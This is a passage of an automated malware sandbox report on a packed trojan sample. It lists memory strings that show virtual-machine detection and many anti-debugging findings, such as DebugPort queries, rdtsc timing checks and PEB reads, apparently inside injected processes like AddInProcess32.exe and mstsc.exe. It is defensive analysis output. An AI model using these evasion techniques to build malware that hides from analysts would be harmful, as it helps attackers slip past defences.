Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD004rFw
Source: SearchUI.exe, 00000016.00000002.899122155.000001B0CF010000.00000004.00000001.sdmp Binary or memory string: *|hyper-v manager*|hyperv3631
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: SearchUI.exe, 00000016.00000003.843512340.000001B8E45F7000.00000004.00000001.sdmp Binary or memory string: nh*|cmd112220*|disk cleanup*|cleanmgr.exe77726*|excel 2013*|microsoft office7310App12227*|default programs*|defult598712233*|defragment and optimize drives*|degrag6248*|file explorer*|window explorer70312378*|geforce experience*|shadowplay56352391*|geforce experience*|gforce652112409*|geforce experience*|nivi6501bwe!App12348*|get started*|windows 10 help3344*|google cloud sdk shell*|cmd1*|google drive*|googledrive6212App12414*|groove music*|open music71364!App12331*|groove music*|play music4514e12415*|hi-rez diagnostics and support*|hi rez2380*|file explorer*|where are my files6187*|file explorer*|windows explorer3803*|geforce experience*|nvide6593p12374*|get started*|windows help3912a!App12368*|hp aio printer remote*|hp printer273812342*|get started*|windows 10 tutorial451012372*|file explorer*|open file explorer710477*|geforce experience*|nvidia ge617112332*|geforce experience*|nvida644587*|global vpn client*|sonicwall423112398*|football manager 2015*|fm964App12322*|games for windows marketplace*|gfwl3576*|google earth*|googleearth640712395*|google play music*|google music2700e12346*|groove music*|play my music5618*|hi-rez diagnostics and support*|hirez1973*|geforce experience*|nvidia ex642612355*|file explorer*|file manager542312375*|groove music*|free music6921!App12337*|groove music*|xbox music67613*|free download manager*|fdm1938el12405*|geforce experience*|gefore5441p12329*|internet explorer*|explorer 11977912490*|intel(r) extreme tuning utility*|xtu1622*|internet explorer*|microsoft explorer8574*|internet download accelerator*|ida356*|internet explorer*|internet exploerer9667*|hyper-v manager*|hyper v4225e12505*|i.r.i.s. ocr registration*|iris12651*|idle (python gui)*|python idle4801*|image composite editor*|ice215App12525*|idle (python 3.5 32-bit)*|python idle50580*|internet download manager*|id,6987p12467*|internet explorer*|internet expolorer10417*|internet explorer*|internet exploreer9110*|internet explorer*|enternet explorer9276*|hp support assistant*|hps4890App12509*|internet download manager*|idman6644*|internet explorer*|interent explorer10096*|hp support assistant*|hp ass4255pp12449*|internet explorer*|internet explorere7950*|internet explorer*|internetexplorer8330524*|internet explorer*|inernet explorer985438*|internet explorer*|internet exlorer10013*|internet explorer*|intenet explorer9908421*|internet explorer*|internet eplorer9958*|internet explorer*|iexplorer.exe9535*|internet explorer*|internet explorer 117905*|internet explorer*|internet exploror10409*|internet explorer*|internet exporer8991*|internet explorer*|iexplore.exe7898*|internet explorer*|web browser10137*|internet explorer*|internet exployer853455*|internet explorer*|internet browser10356Microsoft.WindowsScan_8wekyb3d8bbwe!AppMicrosoft.Windows.Photos_8wekyb3d8bbwe!AppMicrosoft.MinecraftUWP_8wekyb3d8bbwe!
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMwareInc.VMwareViewClient_23chmsjxv380w!App11470
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMware.View.Client10660
Source: explorer.exe, 00000010.00000003.906450432.000000000EEB0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BE*
Source: explorer.exe, 00000010.00000003.906450432.000000000EEB0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZZ[
Source: explorer.exe, 00000010.00000002.1046384297.0000000006136000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000010.00000003.782247022.0000000004CBD000.00000004.00000001.sdmp Binary or memory string: 0ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0040ACD0 LdrLoadDll, 1_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h] 1_2_012D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h] 1_2_012D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h] 1_2_012D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h] 1_2_012D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D4120 mov ecx, dword ptr fs:[00000030h] 1_2_012D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E513A mov eax, dword ptr fs:[00000030h] 1_2_012E513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E513A mov eax, dword ptr fs:[00000030h] 1_2_012E513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B9100 mov eax, dword ptr fs:[00000030h] 1_2_012B9100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B9100 mov eax, dword ptr fs:[00000030h] 1_2_012B9100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B9100 mov eax, dword ptr fs:[00000030h] 1_2_012B9100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BC962 mov eax, dword ptr fs:[00000030h] 1_2_012BC962
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BB171 mov eax, dword ptr fs:[00000030h] 1_2_012BB171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BB171 mov eax, dword ptr fs:[00000030h] 1_2_012BB171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB944 mov eax, dword ptr fs:[00000030h] 1_2_012DB944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB944 mov eax, dword ptr fs:[00000030h] 1_2_012DB944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013351BE mov eax, dword ptr fs:[00000030h] 1_2_013351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013351BE mov eax, dword ptr fs:[00000030h] 1_2_013351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013351BE mov eax, dword ptr fs:[00000030h] 1_2_013351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013351BE mov eax, dword ptr fs:[00000030h] 1_2_013351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E61A0 mov eax, dword ptr fs:[00000030h] 1_2_012E61A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E61A0 mov eax, dword ptr fs:[00000030h] 1_2_012E61A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h] 1_2_013749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h] 1_2_013749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h] 1_2_013749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h] 1_2_013749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013369A6 mov eax, dword ptr fs:[00000030h] 1_2_013369A6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EA185 mov eax, dword ptr fs:[00000030h] 1_2_012EA185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DC182 mov eax, dword ptr fs:[00000030h] 1_2_012DC182
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E2990 mov eax, dword ptr fs:[00000030h] 1_2_012E2990
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4190 mov eax, dword ptr fs:[00000030h] 1_2_012E4190
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BB1E1 mov eax, dword ptr fs:[00000030h] 1_2_012BB1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BB1E1 mov eax, dword ptr fs:[00000030h] 1_2_012BB1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BB1E1 mov eax, dword ptr fs:[00000030h] 1_2_012BB1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013441E8 mov eax, dword ptr fs:[00000030h] 1_2_013441E8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E002D mov eax, dword ptr fs:[00000030h] 1_2_012E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E002D mov eax, dword ptr fs:[00000030h] 1_2_012E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E002D mov eax, dword ptr fs:[00000030h] 1_2_012E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E002D mov eax, dword ptr fs:[00000030h] 1_2_012E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E002D mov eax, dword ptr fs:[00000030h] 1_2_012E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h] 1_2_012CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h] 1_2_012CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h] 1_2_012CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h] 1_2_012CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h] 1_2_012DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h] 1_2_012DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h] 1_2_012DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h] 1_2_012DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01337016 mov eax, dword ptr fs:[00000030h] 1_2_01337016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01337016 mov eax, dword ptr fs:[00000030h] 1_2_01337016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01337016 mov eax, dword ptr fs:[00000030h] 1_2_01337016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01384015 mov eax, dword ptr fs:[00000030h] 1_2_01384015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01384015 mov eax, dword ptr fs:[00000030h] 1_2_01384015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01372073 mov eax, dword ptr fs:[00000030h] 1_2_01372073
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01381074 mov eax, dword ptr fs:[00000030h] 1_2_01381074
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D0050 mov eax, dword ptr fs:[00000030h] 1_2_012D0050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D0050 mov eax, dword ptr fs:[00000030h] 1_2_012D0050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F90AF mov eax, dword ptr fs:[00000030h] 1_2_012F90AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h] 1_2_012E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h] 1_2_012E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h] 1_2_012E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h] 1_2_012E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h] 1_2_012E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h] 1_2_012E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EF0BF mov ecx, dword ptr fs:[00000030h] 1_2_012EF0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EF0BF mov eax, dword ptr fs:[00000030h] 1_2_012EF0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EF0BF mov eax, dword ptr fs:[00000030h] 1_2_012EF0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B9080 mov eax, dword ptr fs:[00000030h] 1_2_012B9080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01333884 mov eax, dword ptr fs:[00000030h] 1_2_01333884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01333884 mov eax, dword ptr fs:[00000030h] 1_2_01333884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B58EC mov eax, dword ptr fs:[00000030h] 1_2_012B58EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB8E4 mov eax, dword ptr fs:[00000030h] 1_2_012DB8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB8E4 mov eax, dword ptr fs:[00000030h] 1_2_012DB8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B40E1 mov eax, dword ptr fs:[00000030h] 1_2_012B40E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B40E1 mov eax, dword ptr fs:[00000030h] 1_2_012B40E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B40E1 mov eax, dword ptr fs:[00000030h] 1_2_012B40E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137131B mov eax, dword ptr fs:[00000030h] 1_2_0137131B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BDB60 mov ecx, dword ptr fs:[00000030h] 1_2_012BDB60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E3B7A mov eax, dword ptr fs:[00000030h] 1_2_012E3B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E3B7A mov eax, dword ptr fs:[00000030h] 1_2_012E3B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01388B58 mov eax, dword ptr fs:[00000030h] 1_2_01388B58
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BDB40 mov eax, dword ptr fs:[00000030h] 1_2_012BDB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BF358 mov eax, dword ptr fs:[00000030h] 1_2_012BF358
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h] 1_2_012E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h] 1_2_012E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h] 1_2_012E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01385BA5 mov eax, dword ptr fs:[00000030h] 1_2_01385BA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C1B8F mov eax, dword ptr fs:[00000030h] 1_2_012C1B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C1B8F mov eax, dword ptr fs:[00000030h] 1_2_012C1B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E138B mov eax, dword ptr fs:[00000030h] 1_2_012E138B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E138B mov eax, dword ptr fs:[00000030h] 1_2_012E138B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E138B mov eax, dword ptr fs:[00000030h] 1_2_012E138B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0136D380 mov ecx, dword ptr fs:[00000030h] 1_2_0136D380
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DEB9A mov eax, dword ptr fs:[00000030h] 1_2_012DEB9A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DEB9A mov eax, dword ptr fs:[00000030h] 1_2_012DEB9A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E2397 mov eax, dword ptr fs:[00000030h] 1_2_012E2397
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137138A mov eax, dword ptr fs:[00000030h] 1_2_0137138A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EB390 mov eax, dword ptr fs:[00000030h] 1_2_012EB390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DDBE9 mov eax, dword ptr fs:[00000030h] 1_2_012DDBE9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013623E3 mov ecx, dword ptr fs:[00000030h] 1_2_013623E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013623E3 mov ecx, dword ptr fs:[00000030h] 1_2_013623E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013623E3 mov eax, dword ptr fs:[00000030h] 1_2_013623E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E53C5 mov eax, dword ptr fs:[00000030h] 1_2_012E53C5
